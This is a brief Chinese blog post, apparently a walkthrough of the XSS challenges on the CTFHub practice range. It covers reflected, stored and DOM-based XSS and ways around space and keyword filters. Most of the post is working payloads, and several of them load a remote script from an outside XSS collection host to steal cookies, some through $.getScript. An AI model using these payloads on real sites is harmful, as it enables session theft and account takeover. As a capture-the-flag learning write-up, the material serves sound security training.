CTFHub靶场————XSS

反射型

写入代码出现弹窗

查看脚本

 输入网页脚本+脚本

查看cookie获取flag

存储型

写入代码查看是否出现弹窗

插入脚本

<sCRiPt sRC=//uj.ci/1b1></sCrIpT>

插入脚本后将网址输入

去平台查看cookie获取flag

DOM反射

写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗

</script><script>alert(1)</script>

 查看脚本注意闭合(利用xss平台的脚本代码)

</tEXtArEa>'"><sCRiPt sRC=//uj.ci/1b1></sCrIpT>

 

查看cookie获取flag

 DOM跳转

检查是否存在弹窗,可以放在url地址栏上执行

?jumpto=javascript:alert(1)

放入脚本,使用$.getScript功能是异步加载并执行

?jumpto=javascript:$.getScript("//uj.ci/1b1")

 

查看cookie获取flag

 

过滤空格 

检查是否存在弹窗

<script>alert(1)</script>

 将代码带入

有空格,用/代替 

<sCRiPt/sRC=//uj.ci/1b1></sCrIpT>

 

查看cookie获取flag 

过滤关键词 

检测是否出现弹窗利用双写绕过过滤

<scrscriptipt>alert(1)</scrscriptipt>

 输入脚本执行

查看cookie获取flag

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值